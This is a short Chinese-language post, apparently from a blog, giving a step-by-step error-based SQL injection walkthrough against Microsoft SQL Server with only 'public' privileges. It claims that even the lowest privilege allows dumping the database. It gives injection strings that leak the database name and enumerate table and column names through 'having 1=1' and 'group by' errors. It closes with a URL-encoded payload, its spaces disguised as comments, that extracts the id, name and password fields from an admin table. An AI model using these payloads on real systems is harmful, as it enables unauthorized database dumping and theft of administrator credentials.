public 权限
第一步获取当前网站数据库名称
最低的权限也是可以脱库的
and db_name()=0-- 获取当前数据库的名称
第二步,通过having 1=1 来爆表名和字段名
第三步, group by admin.id having 1=1 爆出admin 表的字段 name
第四步,把得到的 name id 带入进去 group by admin.id,admin.name having 1=1-- 得到password
第五步,获取字段内容
//and//(select//top//1//isnull(cast([id]//as//nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]//as//nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]//as//nvarchar(4000)),char(32))//from//[testdb]…[admin]//where//1=1//and//id//not//in//(select//top//0//id//from//[testdb]…[admin]//where//1=1//group//by//id))%3E0//and//1=1
mysql
sql server public 权限实战
最新推荐文章于 2024-05-13 12:11:23 发布